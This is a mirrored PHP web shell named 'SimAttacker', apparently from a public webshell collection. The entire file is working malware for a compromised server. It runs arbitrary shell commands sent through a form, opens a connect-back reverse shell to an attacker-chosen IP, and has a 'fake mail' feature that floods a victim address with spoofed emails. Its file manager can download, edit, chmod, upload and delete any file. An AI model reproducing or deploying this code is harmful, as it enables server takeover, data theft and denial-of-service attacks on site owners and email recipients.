mirror of
https://github.com/tennc/webshell
synced 2024-11-26 21:20:18 +00:00
378 lines
No EOL
11 KiB
PHP
378 lines
No EOL
11 KiB
PHP
<?
|
|
//download Files Code
|
|
$fdownload=$_GET['fdownload'];
|
|
if ($fdownload <> "" ){
|
|
// path & file name
|
|
$path_parts = pathinfo("$fdownload");
|
|
$entrypath=$path_parts["basename"];
|
|
$name = "$fdownload";
|
|
$fp = fopen($name, 'rb');
|
|
header("Content-Disposition: attachment; filename=$entrypath");
|
|
header("Content-Length: " . filesize($name));
|
|
fpassthru($fp);
|
|
exit;
|
|
}
|
|
?>
|
|
|
|
<html>
|
|
|
|
<head>
|
|
<meta http-equiv="Content-Language" content="en-us">
|
|
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
|
|
<title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
|
|
<style>
|
|
<!--
|
|
body { font-family: Tahoma; font-size: 8pt }
|
|
-->
|
|
</style>
|
|
</head>
|
|
<body>
|
|
<?
|
|
error_reporting(E_ERROR | E_WARNING | E_PARSE);
|
|
|
|
//File Edit
|
|
$fedit=$_GET['fedit'];
|
|
if ($fedit <> "" ){
|
|
$fedit=realpath($fedit);
|
|
$lines = file($fedit);
|
|
echo "<form action='' method='POST'>";
|
|
echo "<textarea name='savefile' rows=30 cols=80>" ;
|
|
foreach ($lines as $line_num => $line) {
|
|
echo htmlspecialchars($line);
|
|
}
|
|
echo "</textarea>
|
|
<input type='text' name='filepath' size='60' value='$fedit'>
|
|
<input type='submit' value='save'></form>";
|
|
$savefile=$_POST['savefile'];
|
|
$filepath=realpath($_POST['filepath']);
|
|
if ($savefile <> "")
|
|
{
|
|
$fp=fopen("$filepath","w+");
|
|
fwrite ($fp,"") ;
|
|
fwrite ($fp,$savefile) ;
|
|
fclose($fp);
|
|
echo "<script language='javascript'> close()</script>";
|
|
}
|
|
exit();
|
|
}
|
|
?>
|
|
<?
|
|
// CHmod - PRimission
|
|
$fchmod=$_GET['fchmod'];
|
|
if ($fchmod <> "" ){
|
|
$fchmod=realpath($fchmod);
|
|
echo "<center><br>
|
|
chmod for :$fchmod<br>
|
|
<form method='POST' action=''><br>
|
|
Chmod :<br>
|
|
<input type='text' name='chmod0' ><br>
|
|
<input type='submit' value='change chmod'>
|
|
</form>";
|
|
$chmod0=$_POST['chmod0'];
|
|
if ($chmod0 <> ""){
|
|
chmod ($fchmod , $chmod0);
|
|
}else {
|
|
echo "primission Not Allow change Chmod";
|
|
}
|
|
exit();
|
|
}
|
|
?>
|
|
|
|
<div align="center">
|
|
<table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
|
|
<tr>
|
|
<td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
|
|
<p align="center"><b>
|
|
<font face="Tahoma" size="2"><br>
|
|
</font>
|
|
<font color="#D2D200" face="Tahoma" size="2">
|
|
<span style="text-decoration: none">
|
|
<font color="#000000">
|
|
<a href="?id=fm&dir=<?
|
|
echo getcwd();
|
|
?>
|
|
">
|
|
<span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
|
|
<p align="center"><b><a href="?id=cmd">
|
|
<span style="text-decoration: none">
|
|
<font face="Tahoma" size="2" color="#000000">
|
|
CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
|
|
<p align="center"><b><a href="?id=fake-mail">
|
|
<font face="Tahoma" size="2" color="#000000">
|
|
<span style="text-decoration: none">Fake mail</span></font></a></b></p>
|
|
<p align="center"><b>
|
|
<font face="Tahoma" size="2" color="#000000">
|
|
<a href="?id=cshell">
|
|
<span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
|
|
<p align="center"><b>
|
|
<font color="#000000" face="Tahoma" size="2">
|
|
<a href="?id=">
|
|
<span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
|
|
<p> <p align="center"> </td>
|
|
<td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
|
|
<?
|
|
//*******************************************************
|
|
//Start Programs About US
|
|
$id=$_GET['id'];
|
|
|
|
if ($id=="") {
|
|
echo "
|
|
<font face='Arial Black' color='#808080' size='1'>
|
|
***************************************************************************<br>
|
|
Iranian Hackers : WWW.SIMORGH-EV.COM <br>
|
|
Programer : Hossein Asgary <br>
|
|
Note : SimAttacker Have copyright from simorgh security Group <br>
|
|
please : If you find bug or problems in program , tell me by : <br>
|
|
e-mail : admin(at)simorgh-ev(dot)com<br>
|
|
Enjoy :) [Only 4 Best Friends ] <br>
|
|
***************************************************************************</font></span></p>
|
|
";
|
|
|
|
echo "<font color='#333333' size='2'>OS :". php_uname();
|
|
echo "<br>IP :".
|
|
($_SERVER['REMOTE_ADDR']);
|
|
echo "</font>";
|
|
|
|
|
|
}
|
|
//************************************************************
|
|
//cmd-command line
|
|
$cmd=$_POST['cmd'];
|
|
if($id=="cmd"){
|
|
$result=shell_exec("$cmd");
|
|
echo "<br><center><h3> CMD ExeCute </h3></center>" ;
|
|
echo "<center>
|
|
<textarea rows=20 cols=70 >$result</textarea><br>
|
|
<form method='POST' action=''>
|
|
<input type='hidden' name='id' value='cmd'>
|
|
<input type='text' size='80' name='cmd' value='$cmd'>
|
|
<input type='submit' value='cmd'><br>";
|
|
|
|
|
|
|
|
}
|
|
|
|
//********************************************************
|
|
|
|
//fake mail = Use victim server 4 DOS - fake mail
|
|
if ( $id=="fake-mail"){
|
|
error_reporting(0);
|
|
echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
|
|
echo "<center><form method='post' action=''>
|
|
Victim Mail :<br><input type='text' name='to' ><br>
|
|
Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
|
|
Comments:
|
|
<br>
|
|
<textarea rows='10' cols=50 name='Comments' ></textarea><br>
|
|
<input type='submit' value='Send Mail Strm ' >
|
|
</form></center>";
|
|
//send Storm Mail
|
|
$to=$_POST['to'];
|
|
$nom=$_POST['nom'];
|
|
$Comments=$_POST['Comments'];
|
|
if ($to <> "" ){
|
|
for ($i = 0; $i < $nom ; $i++){
|
|
$from = rand (71,1020000000)."@"."Attacker.com";
|
|
$subject= md5("$from");
|
|
mail($to,$subject,$Comments,"From:$from");
|
|
echo "$i is ok";
|
|
}
|
|
echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
|
|
}
|
|
}
|
|
//********************************************************
|
|
|
|
//Connect Back -Firewall Bypass
|
|
if ($id=="cshell"){
|
|
echo "<br>Connect back Shell , bypass Firewalls<br>
|
|
For user :<br>
|
|
nc -l -p 1019 <br>
|
|
<hr>
|
|
<form method='POST' action=''><br>
|
|
Your IP & BindPort:<br>
|
|
<input type='text' name='mip' >
|
|
<input type='text' name='bport' size='5' value='1019'><br>
|
|
<input type='submit' value='Connect Back'>
|
|
</form>";
|
|
$mip=$_POST['mip'];
|
|
$bport=$_POST['bport'];
|
|
if ($mip <> "")
|
|
{
|
|
$fp=fsockopen($mip , $bport , $errno, $errstr);
|
|
if (!$fp){
|
|
$result = "Error: could not open socket connection";
|
|
}
|
|
else {
|
|
fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00 ready 2 USe\n*********************************************\n\n");
|
|
while(!feof($fp)){
|
|
fputs ($fp," bash # ");
|
|
$result= fgets ($fp, 4096);
|
|
$message=`$result`;
|
|
fputs ($fp,"--> ".$message."\n");
|
|
}
|
|
fclose ($fp);
|
|
}
|
|
}
|
|
}
|
|
|
|
//********************************************************
|
|
//Spy File Manager
|
|
$homedir=getcwd();
|
|
$dir=realpath($_GET['dir'])."/";
|
|
if ($id=="fm"){
|
|
echo "<br><b><p align='left'> Home:</b> $homedir
|
|
<b>
|
|
<form action='' method='GET'>
|
|
Path:</b>
|
|
<input type='hidden' name='id' value='fm'>
|
|
<input type='text' name='dir' size='80' value='$dir'>
|
|
<input type='submit' value='dir'>
|
|
</form>
|
|
<br>";
|
|
|
|
echo "
|
|
|
|
<div align='center'>
|
|
|
|
<table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
|
|
<tr>
|
|
<td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
|
|
<td height='28' width='82' align='center'>
|
|
<font color='#000080' size='2'><b>Size KByte</b></font></td>
|
|
<td height='28' width='83' align='center'>
|
|
<font color='#008000' size='2'><b>Download</b></font></td>
|
|
<td height='28' width='66' align='center'>
|
|
<font color='#FF9933' size='2'><b>Edit</b></font></td>
|
|
<td height='28' width='75' align='center'>
|
|
<font color='#999999' size='2'><b>Chmod</b></font></td>
|
|
<td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
|
|
</tr>";
|
|
if (is_dir($dir)){
|
|
if ($dh=opendir($dir)){
|
|
while (($file = readdir($dh)) !== false) {
|
|
$fsize=round(filesize($dir . $file)/1024);
|
|
|
|
|
|
echo "
|
|
<tr>
|
|
<th width='250' height='22' align='left' nowrap>";
|
|
if (is_dir($dir.$file))
|
|
{
|
|
echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'> $file <font color='#FF0000' size='1'>dir</font>";
|
|
}
|
|
else {
|
|
echo "<font size='2' color='#666666'> $file ";
|
|
}
|
|
echo "</a></font></th>
|
|
<td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
|
|
if (is_file($dir.$file))
|
|
{
|
|
echo "$fsize";
|
|
}
|
|
else {
|
|
echo " ";
|
|
}
|
|
echo "
|
|
</b></font></td>
|
|
<td width='103' align='center' nowrap>";
|
|
if (is_file($dir.$file)){
|
|
if (is_readable($dir.$file)){
|
|
echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
|
|
}else {
|
|
echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
|
|
}
|
|
}else {
|
|
echo " ";
|
|
}
|
|
echo "
|
|
</a></font></td>
|
|
<td width='77' align='center' nowrap>";
|
|
if (is_file($dir.$file))
|
|
{
|
|
if (is_readable($dir.$file)){
|
|
echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
|
|
}else {
|
|
echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
|
|
}
|
|
}else {
|
|
echo " ";
|
|
}
|
|
echo "
|
|
</a></font></td>
|
|
<td width='86' align='center' nowrap>";
|
|
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
|
|
echo "<font size='1' color='#999999'>Dont in windows";
|
|
}
|
|
else {
|
|
echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
|
|
}
|
|
echo "</a></font></td>
|
|
<td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
|
|
</tr>
|
|
";
|
|
}
|
|
closedir($dh);
|
|
}
|
|
}
|
|
echo "</table>
|
|
<form enctype='multipart/form-data' action='' method='POST'>
|
|
<input type='hidden' name='MAX_FILE_SIZE' value='300000' />
|
|
Send this file: <input name='userfile' type='file' />
|
|
<inpt type='hidden' name='Fupath' value='$dir'>
|
|
<input type='submit' value='Send File' />
|
|
</form>
|
|
</div>";
|
|
}
|
|
//Upload Files
|
|
$rpath=$_GET['dir'];
|
|
if ($rpath <> "") {
|
|
$uploadfile = $rpath."/" . $_FILES['userfile']['name'];
|
|
print "<pre>";
|
|
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
|
|
echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
|
|
echo "<script language='javascript'> history.back(2)</script>";
|
|
}
|
|
}
|
|
//file deleted
|
|
$frpath=$_GET['fdelete'];
|
|
if ($frpath <> "") {
|
|
if (is_dir($frpath)){
|
|
$matches = glob($frpath . '/*.*');
|
|
if ( is_array ( $matches ) ) {
|
|
foreach ( $matches as $filename) {
|
|
unlink ($filename);
|
|
rmdir("$frpath");
|
|
echo "<script language='javascript'> alert('Success! Please refresh')</script>";
|
|
echo "<script language='javascript'> history.back(1)</script>";
|
|
}
|
|
}
|
|
}
|
|
else{
|
|
echo "<script language='javascript'> alert('Success! Please refresh')</script>";
|
|
unlink ("$frpath");
|
|
echo "<script language='javascript'> history.back(1)</script>";
|
|
exit(0);
|
|
|
|
}
|
|
|
|
|
|
}
|
|
?>
|
|
|
|
</td>
|
|
</tr>
|
|
<tr>
|
|
<td style="border: 1px dotted #FFCC66">
|
|
<p align="center"><font color="#666666" size="1" face="Tahoma"><br>
|
|
Copyright 2004-Simorgh Security<br>
|
|
Hossein-Asgari<br>
|
|
</font><font color="#c0c0c0" size="1" face="Tahoma">
|
|
<a style="TEXT-DECORATION: none" href="http://www.simorgh-ev.com">
|
|
<font color="#666666">www.simorgh-ev.com</font></a></font></td>
|
|
</tr>
|
|
</table>
|
|
</div>
|
|
|
|
</body>
|
|
|
|
</html>
|